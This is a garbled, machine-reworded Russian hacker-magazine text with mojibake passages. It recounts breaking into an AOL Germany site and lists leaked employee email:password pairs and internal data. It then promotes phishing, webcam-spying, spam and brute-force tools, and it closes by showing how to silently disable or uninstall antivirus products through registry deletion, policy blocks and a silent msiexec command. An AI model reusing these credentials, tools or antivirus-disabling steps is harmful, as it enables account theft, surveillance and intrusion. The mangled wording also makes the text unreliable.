com:Delphines fkorupp во этой статистике содержится полная инфа по внутреннему юзерообороту немецкого выделения корпорации после 0006-02-11 :). старое ядро. во AOL жуть любят продукцию мелкомягкой компании :). пропиши снова равно вот это: Order Deny. Здесь моя персона могу отметить несколько основополагающих факторов: сохранение бэкапа на общедоступном месте. незаносчивость файлов равно директорий возьми учет и предсказуемые пароли.de.301.webhack.com:hanne Pierre com:Silvera bettyvonloesch — Joomla! Security/Vulnerability Scanner •http://www. Как моя персона еще писал выше.aol. телефоны. статистика да многое другое.!z 069 . из которых успешно сбрутились 097. В указанных почтовых ящиках находилось ахти много забавных документов: внутренние аоловские расписки.com:varita Вот как только пакет одного с внутренних документов вместе с пометкой «Company Confidential».com de:perikle AgnesAB доступность phpMyAdmin"а в целях внешних пользователей.de:sommer07 tringasvassiliki mdfreedom99 H.081 Как видно.com:wombast Tenge AOL CONFIDENTIAL Закончим сверху нонче не без; многострадальной внутренней сеткой AOL равным образом продолжим вместе с вытащенными мной изо базы данных Джумлы логинами да хешами работников корпорации.INFO info Админка Джумлы Содержимое директории . адреса.418 -Total Hours 0./dnld backconnect на WSO-шелле 1311/tcp open rxmon 1801/tcp open unknown 2099/tcp open unknown 2103/tcp open zephyr-clt 2105/tcp open eklogin 2107/tcp open unknown 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-term-serv 9998/tcp open unknown 13722/tcp open netbackup 13782/tcp open netbackup 13783/tcp open netbackup 49152/tcp open unknown 49153/tcp open unknown MAC Address: 00:13:72:5A:3E:78 (Dell) Как видишь.824 -Reactivations 046 -Overhead Conversions 0 -Cancellations 0.V. фотографии офисов.de:Sommer44 neddie Далее автор этих строк стал неспешно инспектировать полученные пароли на предмет их подходимости для почте аоловцев. резюме работников.ru/download/? case=info&go= 100 — NetCat На твоих глазах развилась очередная история взлома одного с сайтов крупной компании. ÍÀÏÎÑËÅÄÎÊ Чтобы защитить внутренние директории твоего сайта с любопытных глаз.687.173 -Registrations 0. com:brauere Jennifer2706 AOL Germany SNAPSHOT SUMMARY as of COB Date : [2006-02-11] Business : AOL GERMANY (AOL) FOR [2006-02-11] -Ending Members 0. пароли нетрудно поражают своей простотой :). советую в чувствительные директории кинуть .com:elite15 A.com:keiness thomaskuck не без; одной единственной строчкой — Options +Indexes.de:hochzeis Trixi Вот отдельный интересные работоспособные аккаунты: guenterstaar -Terminations 049 -Net Change -50 -Customer Hours 0.net/lab/ pr0js/files. пароли для ebay да paypal (!). XÀÊÅÐ 00 /141/ 00 com:wasistdas а зарядил получи и распишись брут равным образом прочие 050 аккаунтов. org/index. потом прочтения сей опуса твоя милость ввек никак не повторишь глупейших ошибок работников AOL :). PasswordsPro помог ми дешифрировать хеш пароля админа alex.php/ Category:OWASP_ DirBuster_Project — OWASP DirBuster Project •http://www. Но одним админом ваш покорный слуга не ограничился. Надеюсь.com/eng/ passwordspro. что произошел ради банальной безалаберности и невнимательности админа. insidepro.com:Magic23 ClaudiaLangwald Как видишь. Allow Deny from all HTTP://WWW links •http://yehg. А в надежде защитить вообще постоянно файлы такой директории от доступа извне.shtml — PasswordsPro •http://www.com:derwis JennySefkow KrassowskiSabine@ aol.

Fake script — àäðåñ ïîääåëûâàåìîãî ñêðèïòà (åñëè èìååòñÿ ñòðàíèöà àâòîðèçàöèè http://somesite.Âûáîð ôîðìàòà çàõâàòà è ïåðåäà÷è àóäèî (êîëè÷åñòâî êàíàëîâ. 5. fopen. YUV. Также есть расчет отметить. Меняется домицилий обработчика форм. Email — îòñíèôàííûå äàííûå øëþòñÿ íà ìûëî. File — îòñíèôàííûå äàííûå ïèøóòñÿ â óêàçàííûé ôàéë. упрощающий работа фишинга да троллинга юзера ушастого. Если у тебя вкушать любые вопросы до работе генератора. JPEG . Скачивается страница. .ru.âñòàâêà âûáðàííûõ àâàòàð. MJPG. . . работающие сокеты да благообразный домен.Èíäèêàòîðû èñïîëüçîâàíèÿ òðàôèêà è çàãðóçêè ïðîöåññîðà íà ëîêàëüíîé è óäàëåííîé ñèñòåìå. Если но ламер сносно безграмотный введет. 4. òî ïèøåì ïðîñòî «/ adminka/». 3. Socks4.antichat. указанная на настройках. . íà êîòîðóþ áóäåò ïåðåìåùåí þçåð ïîñëå ââîäà äàííûõ. Грабим удаленное видео Тебе ни в жизнь малограмотный желательно понаблюдать после своими соседями согласно локалке? Причем. .php. ru/thread219834. неприлично направляй их прямиком автору скрипта на топик — http://forum.Îïöèîíàëüíàÿ çàùèòà ñåðâåðà ïàðîëåì (ïðîñòàÿ md5-àóòåíòèôèêàöèÿ ñ ñîëüþ). Оптика. которые ты сможешь выкопать в соответствии с адресу redsh. . . 2. à åñëè ñòðàíèöà íàõîäèòñÿ â êîðíå.ôîðìàòîâ (BI_RGB.Ìàëåíüêèé ðàçìåð ïðèëîæåíèÿ (ñåðâåð — 080.ñëó÷àéíûé âûáîð èìåí è ôàìèëèé èç ñîîòâåòñòâóþùèõ ñïèñêîâ.xeka. Настройки выглядят следующим образом: Fake host — ïîääåëûâàåìûé õîñò (åñëè ìû îáìàíûâàåì àâòîðèçàöèþ íà http:// www. .îáõîä êàï÷è ñ ïîìîùüþ ñåðâèñà antigate. YV12. óêàçàííîå â ýòîì ïàðàìåòðå. же пишущий сии строки вместе с радостью предоставляет тебе другую утилиту с заранее обдуманным намерением ради этой цели — многопоточный «Подтверждатель аккаунтов для ВК». Принцип работы скрипта стоит прост: 1.Äëÿ äåêîäèðîâàíèÿ ëþáûõ ôîðìàòîâ íå òðåáóåòñÿ óñòàíàâëèâàòü êàêèå-ëèáî äîïîëíèòåëüíûå êîäåêè.php»).ëîã ðàáîòû. так как аз многогрешный представляю твоему вниманию замечательную прогу — RemCam 0.ðàíäîìíûé ïàðîëü èëè ïàðîëü èç ñïèñêà. то его по новой перебросит в страницу фейка. php?feed=programs&id=20 (также тогда находится равным образом видео от подробнейшим мануалом по захвату какой приглянется аудиовизуальной информации с помощью RemCam 0).Îïöèîíàëüíîå ZLIB-ñæàòèå òðàôèêà. XÀÊÅÐ 00 /141/ 00 . Для основы работы тебе нельзя не настроить скрипт равным образом переполнить сгенерированный им обложка на любой достойный хост. YUY2. Все ссылки получи странице меняются возьми ссылки самого фейкогенератора. . . кой не будет швыряться во шары :).ïîääåðæêà HTTP Proxy. Redirect — ñòðàíèöà. .Ñèñòåìà «êëèåíò-ñåðâåð». . Log type — òèï îïîâåùåíèÿ (mail èëè file). Для работы из генератором тебе понадобится следующий инструментарий: PHP. òî ïèøåì «/»). . прога предоставляется автором с полностью открытыми исходниками.php?t=142.ìíîãîïîòî÷íîñòü (äî 00 ïîòîêîâ â ïàáëèê-âåðñèè). . Забудь насчёт всяческих кейлоггерах.mail. которая с легкостью сможет топтать из-за любыми удаленными аудио/видео-устройствами! Зацени внутренние резервы данной утилиты: . . Socks5.ru/board. ÷àñòîòà äèñêðåòèçàöèè). Все вопросы равно пожелания за работе программы оставляй тут: http://forum. «последить» здесь отмечено во прямом значении сего слова. UYVY. ru»). . I420.html.ru/ showthread.ru/adminka/ loginhere. Y8. Fake path — ïóòü ê ïîääåëûâàåìîé ñòðàíèöå (åñëè èìååòñÿ ñòðàíè- öà àâòîðèçàöèè http://somesite. ðàçðåøåíèå).Âûáîð ôîðìàòà âèäåîçàõâàòà (âèäåîôîðìàò. NV12.5 Êá). è äðóãèå).Àâòîìàòè÷åñêàÿ áàëàíñèðîâêà àóäèî è âèäåîïîòîêîâ ïðè íåõâàòêå ïðîïóñêíîé ñïîñîáíîñòè êàíàëà.Àäðåñíàÿ êíèãà äëÿ ñåðâåðîâ ñ âîçìîæíîñòüþ èìïîðòà è ýêñïîðòà. каковой твоя милость как и сможешь сыскать для нашем диске. ru/adminka/. сниферах и иже со ними.Ñæàòèå âèäåîïîòîêà â JPEG ñ íàñòðàèâàåìîé ñòåïåíüþ êâàíòîâàíèÿ. 070 Кстати.Ïîääåðæêà ðàñïðîñòðàíåííûõ RGB.çàïîëíåíèå ñòðàíèö íà 08%.ВЗЛОМ Маг icq 084888 X-TOOLS ПРОГРАММЫ ДЛЯ ХАКЕРОВ Программа: RemCam 0 ОС:Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: redsh Описание: .Êîäèðîâàíèå àóäèîïîòîêà â IMA ADPCM. . Возможности проги: . что-нибудь умереть и отнюдь не встать встроенном функционале реггера нет возможность подтверждения свежезареганных аккаунтов по мылу. òî ïèøåì òîëüêî «mail. Программа: VK Regger ОС: Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: 0pTik А вона равно ожидаемая многими тулза — реггер аккаунтов ВКонтакте через мембера Античата. . òî ïèøåì «loginhere. Снифер снифает однако введенные пользователем эмпирика равным образом перенаправляет его получи и распишись продемонстрированный тобой адрес. Программа: aNYfAKE ОС: *nix/win Автор: b00zy_c0d3r and The Mafia А вишь равно первоочередной иразер фейков.

. â êîòîðîì íàéäåíî èñêîìîå ñëîâî.txt.íå ïðîïóñêàòü «ãóäû». . Автор со радостью выслушает твои отзывы о работе проги здесь: http://forum.îòîáðàæåíèå èíôîðìàöèè ïî çàãðóæåííûì è âûâåäåííûì â îíëàéí íîìåðàì.óäîáíûå íàñòðîéêè. . .ïîääåðæêà antigate è ðó÷íîãî ââîäà êàï÷è.îòêðûòèå ôàéëîâ èëè ïàïîê ïðÿìî èç ãëàâíîãî îêíà ïðîãðàììû. . . включить капчу (вводится единолично раз) и нажать нате кнопку «Start».óäàëåíèå ïîêëîííèêîâ. .àíòèáàí.net.S. .txt. .ïðè âûâîäå ðåçóëüòàòà ñðàçó æå ïîäñâå÷èâàåòñÿ êóñîê ñòðîêè.antichat. . Прими закачаешься внимание.î÷åíü âûñîêàÿ ñêîðîñòü ðàáîòû. . насадить логин жертвы. .ïîäðîáíàÿ ñòàòèñòèêà. P. Так что.ëîã ñ àâòîî÷èñòêîé. . по причине которым к тебе во шоху ломится груда номеров из предложениями черт знает что урвать да сверху черт знает что приняться :) Как приметно с названия.5. . Итак. данная обслуживающая программа служит пользу кого добавления на твой аккаунт бесконечного количества поклонников да обладает следующим функционалом и особенностями: .ïðîãðàììó íå íàäî óñòàíàâëèâàòü (èçíà÷àëüíî èäåò âñåãî ëèøü îäèí ôàéë). Windows Vista è Windows XP. а что-то вместе с ними позволительно делать дальше? Для работы со списками таких акков существует целая полк специализированного софта (многие программы малограмотный разок описывались на страницах нашей рубрики).ìàëîå ïîòðåáëåíèå ÎÇÓ (ïðè îáðàáîòêå 00000 ôàéëîâ ïîòðåáëåíèå ÎÇÓ íàõîäèòñÿ â ïðåäåëàõ 04 Ìá). .html.îáðàáîòêà áîëüøèõ ôàéëîâ (îò 0 Ãá). . разве внутри огромного количества текстовиков тебе понадобилось сыскать мыло/ пароль/асю/номер телефона равным образом иже из ними.îáðàáîòêà ëþáîãî êîëè÷åñòâà ôàéëîâ. . . Все вопросы сообразно работе тулзы советую постить на топик http://webxakep. того спешу показать прогу ArxFinder — редкостный приспособление с целью поиска текста на любом количестве файлов. то лучшим решением полноте использование ArxFinder.ru (вдруг тебе понадобится снять красивый закидон аськи. Удачного брута! :) Программа: ArxFinder ОС: Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: ArxWolf Реггер аккаунтов ВКонтакте вслед работой Программа: VkFunAdder 0. .áðàòü ñëîâà äëÿ áðóòà èç ñëîâàðÿ dict. что-нибудь оценка в аккаунте.ïîèñê ìîæíî âåñòè êàê ïî âñåì ôàéëàì. VkFunAdder как раз равным образом является одной изо таких программ. Windows 0 Maximum. Вот в чем дело? умеет данная утилита: . Если твоя милость целое а собрался эксплуатировать прогу по ее прямому назначению. к которому твоя милость хочешь подложить поклонников.z 071 .net/forum/ showthread. ICQ Light Spam — это программа на рассылки спам-сообщений по ICQ. Возможности равным образом особенности спамера: XÀÊÅÐ 00 /141/ 00 ICQ-спамер на действии .ìàëàÿ íàãðóçêà íà ïðîöåññîð (ïðè îáðàáîòêå 00000 ôàéëîâ íàãðóçêà ñîñòàâëÿåò æàëêèå 05-20%).NET Framework 0.ñêîðîñòü ïåðåáîðà çàâèñèò îò ñêîðîñòè èíòåðíåòà (äî 00 ñåêðåòíûõ îòâåòîâ â ñåêóíäó íà 00 Ìáèò).запустить прогу. . в таком случае помни — да мы со тобой против спама! Программа: ASR Brute ОС: Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: q1w2e3 Брутер секретных ответов нате Рамблере На очереди вновь одна замечательная график ото q1w2e3. .ðàáîòàåò íà . òàê è ïî îäíîìó èëè ãðóïïå òèïîâ. â êîòîðîì íàéäåíî ñëîâî (òî åñòü íå íàäî áóäåò êàæäûé ðàç îòêðûâàòü îäèí è òîò æå ôàéë).âîçìîæíîñòü çàãðóçêè ñðàçó íåñêîëüêèõ óèíîâ äëÿ ñïàìà. . Особенности программы: .txt. . .ñîõðàíÿòü ïîäîáðàííûé îòâåò â good.3 ОС: Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: IOFFE Добавляем поклонников ВКонтакте Вот нарегал твоя милость небольшую толику десятков тысяч аккаунтов ВКонтакте.âîçìîæåí ïîèñê ïî ðåãóëÿðíûì âûðàæåíèÿì. .txt. . ASR Brute (Answer Secret Rambler Brute) — сие брутер секретных ответов на Rambler.ðàññûëêà ñîîáùåíèé ïî âûáðàííîìó äèàïàçîíó. .ãàðàíòèðîâàííàÿ ðàáîòà íà Windows 7 Ultimate. Программа: ICQ Light Spam ОС: Windows 0000/XP/2003 Server/ Vista/2008 Server/7 Автор: q1w2e3 Исключительно вследствие образовательных целей представляю твоему вниманию безраздельно изо многочисленных ICQ-спамеров.êíîïêè «Ñòàðò» è «Ñòîï». Для основания процесса перебора тебе сумме лишь необходимо оставить особый азбуковник во dict.ñîõðàíÿòü íåïðàâèëüíûå îòâåòû â bad.php?t=7693. .ðàáîòàòü áåç ïðîêñåé. какой был привязан к Рамблеру?). .ru/ threadnav207277-1-10.îòîáðàæåíèå ñêîðîñòè îòïðàâêè ñîîáùåíèé â ñåêóíäàõ.ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ â ñîîáùåíèè — 0000. Ищем слова на тысячах файлов Давненько получи и распишись страницах нашей рубрики никак не появлялись релизы ото команды webxakep.óíèêàëüíàÿ âîçìîæíîñòü ïðîñìîòðà ôðàãìåíòà òåêñòà.ïðîãðåññáàð.ìíîãîïîòî÷íîñòü + àâòîâûáîð ïîòîêîâ (îò 0 äî 000).ñ÷åò÷èê îòïðàâëåííûõ ñîîáùåíèé è îøèáîê îòïðàâêè. . . выбрать домен.îíà ìíîãîïîòî÷íà. P. должен составлять сильнее 000 единиц. Итак.S. .àêêè çàíîñÿòñÿ â ñïèñîê â âèäå mail:password. посвященная аськам и мыльникам.

Сегодня на нашу краш-лабораторию попали три популярных антивирусных программы. Хотя о чем речь? Какие правила? Какие общо могут состоять инструкция в войне — войне вирусов равным образом антивирусов? Кто более — оный равно прав. которые самочки разработчики называют «щитами» (щит поведения. трояны.MALWARE deeonis ÏÐÈÍÖÈÏ ÒÅÑÒÈÐÎÂÀÍÈß Для сызнова присоединившихся напомним. беспрестанно и быстро защищающая пэвм ото такого вредоносного ПО. утилита всё бесплатна. во равным образом все правила.2. Avast. нами были разработаны пяточек ужасных испытаний. методика avast! Intelligent Scanner. точное обнаружение угроз. Основными ее достоинствами являются столп через руткитов на реальном времени. HIPS (Host Intrusion Prevention System) и высокую быстрота работы. щит P2P/мгновенных сообщений да т.д. кто оказался самым стойким. К достоинствам данного продукта позволено отнести наличие проактивной защиты. а да разнообразные модули защиты. Как справедливо с его названия. Все опыты проводились на Windows XP Professional SP3. В роли следующего подопытного выступает avast! Free Antivirus. черви. действовать всё-таки дельно равным образом за правилам. За усвоение каждого теста выставляется таксировка по части пятибальной шкале. что и каким образом пишущий сии строки тестируем. полноте Avira AntiVir Personal.п. Теперь капельку что касается самих тестах. по причине чему снискала большую 072 популярность изумительный во всех отношениях мире. каковой подвергнется нашим краш-тестам. Некоторые тесты представляют собой специально написанные мной программы. мистификаторы. Со слов рекламщиков — сие надежная бесплатная антивирусная программа. рекламного ПО. Backdoor-программы. наконец. червей. другие позволено нагнать автоматизированный вместе с через стандартных инструментов Windows. что вирусы. И ты да я их придерживаемся. Итак. фишинг-атак да руткитов.). шпионских программ. третьим (и последним) антивирусом. Так по образу мы проводим краш-тестирование. Avira: ïðîâåðèì èõ íà ñòðåññîóñòîé÷èâîñòü Вообще-то ты да я могли бы дешифрировать толстые талмуды для методики тестирования антивирусов.com ÊÐÀØ-ÒÅÑÒ ÀÍÒÈÂÈÐÓÑÎÂ: òðîéíàÿ ïåíåòðàöèÿ Nod32. В конце автор сих строк подсчитаем среднеарифметическое всех оценок равно посмотрим. Он представляет собой решение с целью защиты домашнего компьютера от вирусов. нам пр осто нравится все ломать :). диалеры равно т. И. ведь равным образом испытаXÀÊÅÐ 00 /141/ 00 . троянских программ. Кроме того. Первый конкурент — сие антивирус ESET NOD32 версии 0.

ввиду NOD32 неслышно равно умиротворенно предотвратил попытку собственного удаления от жесткого диска пользовательской машины.. то антивирь получает жирную двойку. Приступим для испытанию.exe равно avasrui. бросьте невозвратимо удален по прошествии перезагрузки ОС. Этот подходец был ладно описан во прошлой статье. только не без; одним-единственным отличием — линия ко удаляемому файлу я передаем в зашифрованном виде. и оный и другой антивируса в духе новенькие. потому воплощаться они будут с через стандартных средств ОС Windows.exe. в надежде обмануть эвристики испытуемых антивирусов. После перезагрузки дьявол по сию пору что-то около а радует нас своей замечательной иконкой во трее.exe. а второй попробует деинсталлировать ПО лишенный чего лишнего шума да пыли. в чем дело? его осилит аж самый беззаботный хакер. а третьим — флажок MOVEFILE_DELAY_UNTIL_REBOOT. сколько его хотят уничтожить со родного жесткого диска. Îáíîâëÿåì áàçû ñèãíàòóð ния у нас будут соответствующие. никаких специальных утилит я отмечать никак не будем. как бы совершенно сие переживут наши антивирусы. и они выдержали сие нападение. так рядом этом скрывает сей факт. Если запустить NOD32 равным образом поглядеть на воздушный лоцман задач. В командной строке автор сих строк передадим ей полное наименование файла. Запускаем утилиту чтобы удаления. К сожалению. После перезагрузки антивирус успешно запустился. что-то равным образом во первом тесте. avshadow. NOD32 опять героически выдерживает наступление для приманка exe’шники. Никаких лишних сообщений. XÀÊÅÐ 00 /141/ 00 Avira â äåéñòâèè Но у нас осталось сызнова двойка претендента получи должность самого стойкого. делаем ребут и. Программа вызовет системную функцию MoveFileEx. с тем антивирь безграмотный догадался. Всем пятерки. сия отправления может передвигать файлы равно папки. ведь файл. Разумеется. указав нужные файлы равно перезагружаем компьютер. Основная их задание — следовательно из строя антивирусное ПО во вкусе допускается побольше постепенно ради пользователя. краш-тесты готовы к запуску. перед зашифровав их полные имена.2 Ñðàâíèòåëüíàÿ òàáëèöà ðåçóëüòàòîâ 073 . ÒÅÑÒ ¹3 Третье искус опять же хорош прочь нужные чтобы антивирусного ПО файлы.7 Avira AntiVir Personal 5 5 5 3 4 3 4. какой никак не может оказываться проанализирован эвристическими движками. ко сожалению. в некоторых случаях однако нюансы оговорены. Если во результате выполнения того alias иного теста защитные функции наших «лабораторных образцов» перестали работать.Ïîëüçîâàòåëüñêèé èíòåðôåéñ NOD32. да присутствие этом хорош являть самовластно видимое дело попытки удаления. что первокурсники перед экзаменом.exe. ведь позволено увидеть два процесса: egui. путь для которому приходится фигурировать прописан на первом параметре нашей чудо-функции. Если на качестве второго параметра передать NULL. А вот avast! Free Antivirus равным образом Avira AntiVir Personal. приступим ко самому интересному.exe. Но никак не несложно удалить. притом бери пять. Первый тест хорэ придурковато пробовать уничтожить самые важные бинарные файлы дистрибутива антивируса. а антивирусы трясутся ото страха. рядом желании всегда это дело дозволительно привести в исполнение программно. Скажу лишь.. Вот их-то мы равным образом попытаемся удалить. И пока что до некоторой степени слов по отношению каждом испытании во отдельности. Запускаем тест. Итак. Теперь посмотрим. Атаковать я будем однако те а файлы. Первый запущен со правами текущего пользователя.exe. Ну а теперь.. единолично с тестов будет запрещать пуск антивируса за средствам политический деятель безопасности. Все справились получи «отлично». ÒÅÑÒ ¹1 Первый задача достаточно проделан средствами сознательно написанной утилиты. поэтому возвращаться для нему автор сих строк теперь отнюдь не будем. который хотим изъять присутствие следующей загрузке ОС. Четвертое и пятое испытания стоят особняком. заставляющих пользователя действовать выбор. маскируя затребование смертоносной API-функции перед вполне смиренный код. Процедура шифрования равно как невыгодный капли простая. В противном случае автор сих строк будем смотреть.exe равно ekrn. Код программы до тех пор прост. И аваст. Это отвратительно.. Третий испытание вдобавок удаляет насущно важные файлы. Второй будет делать в таком случае а самое. по образу ПО справилось из проблемой. Тест пройден. avguard. Для сего возле вызове функции MoveFileEx наш брат будем скрывать флаг ESET NOD32 Òåñò ¹1 Òåñò ¹2 Òåñò ¹3 Òåñò ¹4 Òåñò ¹5 Òåñò ¹6 Ñðåäíèé áàëë 5 5 5 3 2 3 3. Мы используем сепаратный трюк. Если появилось хоть какое-нибудь извещение пред смертью. В случае со avast пишущий сии строки будем пойти получи и распишись штурм файлы avastsvc. хотя около этом хитроумно кодировать название удаляемого файла. ÒÅÑÒ ¹2 Второй краш-тест прагматично всецело повторяет первый. да авира справились нате пятерку. а следующий — из привилегиями системы. что-нибудь основан некто на алгоритме генерации ключа криптования. а снести закачаешься время загрузки ОС не без; через специальной API-функции. а с Avira AntiVir — avgnt.8 avast! Free Antivirus 5 5 5 3 5 5 4. никаких намеков возьми отлаженность во работе. в таком случае оно справедливо заслужило как партминимум тройку.

. Откроется кронштейн не без; групповыми политиками. Всем сообразно трояку. какой-никакой выпукло заявляет об наших намерениях. И то. но точно переквалифицируется во выставка прелести для того котят. господа. сколько сталось с NOD32. не поддающегося эвристике. Но у нас еще остается чаяние возьми Аваст. То а самое да со шестым испытанием. Цепь побед антивирусов прервана. Хотя. которые без устали работают надо их защитой. к примеру. основываясь на имени исполняемого файла. но во пользовательским интерфейсом нигде да безграмотный пахнет. ðåäàêòîð ðóáðèêè «Malware» Ну. да avast!.exe. почто нам безвыездно но посчастливилось ее (эту защиту) подточить. ïîñòîÿííûé àâòîð. Проверить. что-то они защищают приманка файлы с через своих а драйверов-фильтров ФС. не возбраняется вычислять достойным результатом. Жмем кнопочку рестарта системы. возлюбленная будет справедлива. И что? Да у нас тут прямо вирусный зоопарк. чтобы 05% всех организаций вообще. Разработчикам антивирусов склифосовский по-над нежели подумать и что-то рационализировать во следующих версиях своих продуктов. Но никак не будем запамятовать равным образом по части других. я ждем загрузки ОС. заключается на том. В конце концов. âðàã àíòèâèðóñîâ è ïîâåëèòåëü íóëåâîãî êîëüöà Позволю себя пояснить лишь одну ситуацию — возьмем. хорошее дело. Драйвер слежения ради реестром просто запрещает какие-либо опасные поступки на отношении ключей. в такой мере равно чувствуют. идеже ваш покорнейший слуга работаю. удаления сиречь изменения бинарников. у каждого с сих продуктов за спиной ряд планирование эволюции да большая директива вдоволь высокоинтеллектуальных разработчиков. который я смогли чисто деинсталлировать один знатный равно платный антивирус равным образом отнять гуя парочку других. наверное. объединение которой из-за первые три теста до этого времени антивирусы получили соответственно пятерке. все же нам все удалось сломить сии творения антивирусной индустрии. а вернее — криптооперация сего параметра. а во прикладные пользовательские программы неграмотный стартовали. работа ekrn. Это нетрудно бизнес. далеко не говоря еще о большой да жирной двойке? Похоже. «System». вперед безвыгодный забыв указать пути ко файлам. После нажатия кнопочки OK равно перезагрузки компьютера терпеливо ждем. возможно. сие попросту тормоза. ÒÅÑÒ ¹4 Следующий опробывание я будем жить со через стандартных инструментов Windows XP Professional. Наша самооценка полегоньку начинает расти. разве честно. зачем чрез малость секунд наш брат узнаем относительно том. даже если честно. После чего снаряжение пишущий сии строки будущее покажет «Don"t run specified Windows applications».msc. Своей очереди ждет NOD32. То. повергает нас на полное уныние. Работает. Если у нас никак не получилось их удалить. Одно радует — впереди до сего поры принимать тесты. Экран потух равным образом враз но загорелся. Итак. Àëåêñàíäð Ýêêåðò. Для сего во главном разблюдовка системы нужно найти условие «Выполнить. Далее долженствует шумнуть сообразно элементу «User Configuration». спустя время «Administrative Templates». удаляются ли нужные файлы равно ключи реестра. Подождем еще минутку. Неужели безвыездно вновь заработали по пять баллов равным образом да мы не без; тобой никому безграмотный влепим хоть жалкой троечки. Картина идентична два предыдущим. В политиках винды ты да я пропишем двуха исполняемых файла: egui. То.. ту организацию. Побежала стих загрузки старой доброй Windows Ïî÷åìó âñå òàê õîðîøî ñïðàâèëèñü? Основная причина. ни от минуту. Аваст повел себя без мала эдак же. И чисто поуже радостное «Welcome» в приятном синем фоне сообщает нам по отношению том. на правах равно NOD — запустилась всего системная служба. доступны обновления. А об эту пору смотрим нате ситуацию на — сколько позволяется увидеть? Везде стоят вирусы. будет претворяться в действительность от через всё-таки того а трюка из генерацией ключа. во том числе да у команды админов (в их количество моя персона далеко не вхожу). которые должны бытовать стерты со поверхности диска. в чем дело? дает случай гладко разобраться с антивирусом. Системный динамик на полутонах пикнул. а вирусы как чувствовали себя на правах нате курорте. что. ужас просто-напросто — достанет загрузиться на Safe mode да проверить. только значка антивируса отнюдь не видно. наша краш-лаборатория медленно. HIPS"ы со временем всякие. Ëîçîâñêèé Àëåêñàíäð. ей-ей еще такими несложными способами.exe все же был запущен. почто безграмотный дает ни единого шанса испортить работу антивиря изо третьего кольца. жестко пресекаются нате уровне ядра. что-нибудь пишущий сии строки видим.exe равным образом ekrn. тож хоть бы держи Avira AntiVir. Недалеко ушел равным образом Avira AntiVir. 074 XP. работают в духе ни на нежели неграмотный бывало. куда радует. в таком случае попробуем ежели и бы не допустить им загрузиться. Троечка. Делается сие в свой черед во нулевом кольце ОС. файерволы. ОС поуже загрузилась. В безопасном режиме «лишние» драйвера не грузятся. К нашему глубокому сожалению. нате которой оказалось с грехом пополам значительнее 0. входящих во число антивируса. Проверку бери надёжность опять двадцать пять начинаем с NOD’а. который но мешает утвердить диверсию. едва куда ни кинь стоят аверы. Эта опция позволяет воспретить включение определенных программ. на правах часы. Запускаем утилиту ради теста. Все попытки записи. XÀÊÅÐ 00 /141/ 00 . Маскировка. полть изо них имеют постоянный доступ на сеть. Однако. то очищать не имеется значка во трее.. ни через две антивирус в такой мере равным образом далеко не стартовал. безвыгодный больше.MALWARE À âîò è çàùèòà avast! îò íåñàíêöèîíèðîâàííîãî óäàëåíèÿ Óñòàíîâêà Avira AntiVir Personal MOVEFILE_DELAY_UNTIL_REBOOT. Они оба. В незаинтересованный раз проделывая еще недурственно знакомые нам операции.. порядка 000 машин. и Avira. да безвыгодный будто никаких окон. проактивки. Победа? Заглянем во командир транспорта задач.» равно внести тама следующее: gpedit. А со ним ничто равно безвыгодный произошло.5k экземпляров одного да того но вируса. Мне а именно флешку принесли с документами. оттого обычными методами расписание омрачить нельзя. которые связаны от работой антивируса.

Но чересчур хорошие результаты проверки антивирусов безграмотный давали нам покоя. Сейчас я будем приискивать ключи реестра. Словацкий антивирус получает заслуженную двойку.exe. на первых порах подставив на нее желаемый GUID. И завершает список ESET NOD32 не без; жалким результатом на 0. То есть. За такую внимательность avast получает твердую пятерку. Вызывается спирт побольше нежели странно: C:\Program Files\Alwil Software\Avast5\aswRunDll. как равно NOD32 — дневной журнал реестра. Например. Для тихого удаления нужно нагнать команду. ÒÅÑÒ ¹6 Да. ответственных за старт службы равно драйвера. Жаль. службы равно драйверы живут смотри во такой ветке: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\. Вот от через сего режима пишущий сии строки и будем коротать диверсию. Через минуту компьютер перезагрузится равным образом с антивируса малограмотный останется равно следа. в свой черед оканчивается неудачей. Все антивирусы. Все важные в целях запуска объем находятся в тех но местах. NOD32. однако потом аваста рука отнюдь не поднимается — а неожиданно неизвестный сообразит. который находится во вышеуказанной ветке реестра. Удаляется оный параметр очень пусть даже хорошо. На втором месте Avira AntiVir Personal — 0. при случае пользователю не задается никаких лишних вопросов. которая осуществляет управление драйвером да часть UI. похожую получи и распишись эту: Óäàëèòü ÍÎÄ îêàçàëîñü ïðîùå âñåãî msiexec /quiet /uninstall {1A59064A-12A9-469F-99F604BF118DBCFF} Разумеется. У него глотать настоящий программа с целью мониторинга обращений для файловой системе равным образом реестру Windows. служащие гарантией загрузки служб и драйверов. для нашему сожалению. Аваст получает пятерку. Авира получает троечку. После старта ОС иконка NOD’а на трее невыгодный появилась. да мы не без; тобой обещали просто-напросто число тестов. а смотри нормальный авторан был немилосердно удален изо реестра. Ну. Практически у всех современных инструментов ради развертывания приложений во системе очищать беспричинно называемый «тихий режим».7 балла. ÈÒÎÃÈ Испытания закончены. Но ты да я малограмотный отчаиваемся да пробуем сломать хотя бы запускание UI-части. как да до сей времени уважающие себя антивирусы. С драйвером та а история. удалив подключ ekrn. ко тому же. так чтобы читатель околесица далеко не заметил. стремился ко лучшему. отключить автозагрузку UI-части антивируса нам равным образом безграмотный удалось. остались неприкосновенны. так пользователь бы увидел сие (см. Но равно вычеркивание ключей. ответственные следовать включение антивируса. Для сего шагом марш во HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run да находим там параметр. Все сии компоненты прописаны в системном реестре. Лучшим оказался avast! Free Antivirus набрав 4. Все наши попытки швырнуть спокойный политическое устройство окончились неудачей.2 балла. жаль. Да и. по малой мере и с небольшими оговорками. по-видимому бы позволяется установить равно пятерочку. Следующий по списку — avast. почто равным образом у NOD’а. равно пишущий сии строки жизнерадостно перезагружаем компьютер. равно слаживаться их удалить. Начнем от NOD32. Попробуем воспрепятствовать старту службы ekrn. равно автор сих строк решили устроить им до сей времени одно испытание. Удалять ты да я будем так. Чтобы. Avira AntiVir повел себя как следует в такой мере же. ESET NOD32 получает тройку. виновный после запускание egui.exe. А зачем а вместе с Avira AntiVir 